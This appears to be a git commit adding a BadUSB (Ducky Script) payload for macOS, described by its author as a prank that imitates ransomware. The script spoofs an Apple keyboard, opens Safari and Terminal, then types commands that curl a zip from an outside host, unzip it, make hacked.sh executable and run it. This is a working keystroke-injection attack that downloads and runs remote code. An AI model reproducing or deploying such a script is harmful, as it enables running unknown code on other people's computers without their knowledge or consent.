Add badusb/corteximplant-ransomware-macos.txt

This commit is contained in:
Ramses Revengeday 2024-09-04 20:43:47 +00:00
parent 658434ffea
commit 4b7f6206de

View file

@ -0,0 +1,40 @@
REM -----
REM Useless fun BadUSB script meant to imitate ransomware.
REM Open corteximplant.org in Safari and then
REM download hacked.sh, a bash script with the appearance of randomware.
REM
REM Created by Revengeday
REM Fedi: @revengeday@corteximplant.com
REM -----
ID 1234:5678 Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING safari
ENTER
DELAY 1500
STRING corteximplant.org
ENTER
DELAY 1500
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1500
STRING curl -O https://corteximplant.org/stuff/hacked.zip
ENTER
DELAY 5000
STRING unzip hacked.zip
ENTER
DELAY 1500
STRING rm hacked.zip
ENTER
DELAY 1500
STRING chmod +x hacked.sh
ENTER
DELAY 1500
STRING clear
ENTER
DELAY 500
STRING ./hacked.sh
ENTER